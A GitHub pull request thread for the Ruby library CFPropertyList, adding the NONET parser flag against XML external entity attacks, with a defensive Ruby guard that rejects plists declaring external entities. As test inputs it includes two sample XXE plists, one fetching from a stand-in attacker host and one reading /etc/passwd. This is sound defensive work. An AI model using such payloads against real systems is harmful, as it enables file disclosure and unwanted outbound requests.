ckruse / CFPropertyList

Read, write and manipulate both binary and XML property lists as defined by Apple
MIT License

Include NONET flag for security #54

Closed tboyko closed 5 years ago

tboyko commented 5 years ago

Currently, CFPropertyList processes external URL entities in plists. This can lead to third-party attacks: a PLIST is provided that references an external URL, causing CFPropertyList to contact the host of the URL to download its contents and include it in the XML.

This merge request extends the spirit of the NOENT parser option by adding NONET as well.

More information about this type of vulnerability is available at https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
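
Added example, not part of this PR and not CFPropertyList's own code. NOENT and NONET are libxml2 parser options: XML_PARSE_NOENT substitutes entities, XML_PARSE_NONET forbids network access (libxml2 refuses http:// and ftp:// entity loads), so NONET is what stops the outbound fetch described above. It does not cover file:// URIs, and it only helps on a libxml-based backend. The Ruby below, stdlib only (REXML), is a backend-independent guard a caller can put in front of any plist parser: inspect the DOCTYPE and refuse any document that declares external entities before a single value is read. The host name, file path and plist contents are constructed for the example.

```ruby
require 'rexml/document'

# Added example, not CFPropertyList code. Rejects plists whose DOCTYPE declares
# external entities (SYSTEM/PUBLIC identifiers) before any value is read, so a
# parser that resolves such entities never gets the chance to fetch them.

class UnsafePlist < StandardError; end

# Names of entities declared with an external identifier in the DOCTYPE.
# REXML records the declarations but never fetches external entity content,
# which is what makes it usable as a pre-check here.
def external_entities(xml)
  doc = xml.is_a?(REXML::Document) ? xml : REXML::Document.new(xml)
  doctype = doc.doctype
  return [] unless doctype
  doctype.entities.values.select(&:external).map(&:name)
end

# Loads a plist whose top-level value is a <dict> of <string> values (enough
# for the demonstration) and refuses anything that declares external entities.
def load_plist_strict(xml)
  doc = REXML::Document.new(xml)
  bad = external_entities(doc)
  raise UnsafePlist, "external entities declared: #{bad.join(', ')}" unless bad.empty?

  dict = doc.root.elements['dict']
  raise UnsafePlist, 'expected a <dict> at top level' unless dict

  result = {}
  key = nil
  dict.elements.each do |el|
    if el.name == 'key'
      key = el.text.to_s
    else
      result[key] = el.text.to_s
    end
  end
  result
end

# --- constructed inputs ------------------------------------------------------
# The DOCTYPE Apple's tools emit; it carries only an external DTD reference.
APPLE_DOCTYPE = '<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" ' \
                '"http://www.apple.com/DTDs/PropertyList-1.0.dtd">'

BENIGN_PLIST = <<~XML
  <?xml version="1.0" encoding="UTF-8"?>
  #{APPLE_DOCTYPE}
  <plist version="1.0">
  <dict>
    <key>CFBundleIdentifier</key>
    <string>com.example.demo</string>
    <key>CFBundleVersion</key>
    <string>1.2.3</string>
  </dict>
  </plist>
XML

# The attack from the PR: an entity pointing at a remote host (made-up name).
# A parser with network access enabled would issue a request to it.
REMOTE_XXE_PLIST = <<~XML
  <?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE plist [
    <!ENTITY remote SYSTEM "http://attacker.invalid/payload.txt">
  ]>
  <plist version="1.0">
  <dict>
    <key>CFBundleIdentifier</key>
    <string>&remote;</string>
  </dict>
  </plist>
XML

# Same idea against a local file: NONET does not block this, the DOCTYPE check does.
LOCAL_XXE_PLIST = <<~XML
  <?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE plist [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
  ]>
  <plist version="1.0">
  <dict>
    <key>CFBundleIdentifier</key>
    <string>&xxe;</string>
  </dict>
  </plist>
XML

if __FILE__ == $PROGRAM_NAME
  p load_plist_strict(BENIGN_PLIST)
  [REMOTE_XXE_PLIST, LOCAL_XXE_PLIST].each do |xml|
    begin
      load_plist_strict(xml)
    rescue UnsafePlist => e
      puts "rejected: #{e.message}"
    end
  end
end
```

The guard is deliberately stricter than NONET: a plist never needs its own entity declarations, so any `<!ENTITY` with an external identifier is grounds for rejection regardless of scheme, and the check runs on the DOCTYPE alone, before values are touched.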

ckruse commented 5 years ago

Good catch. Thank you for your patch! :heart:

ckruse commented 5 years ago

I pushed a new release with your fix.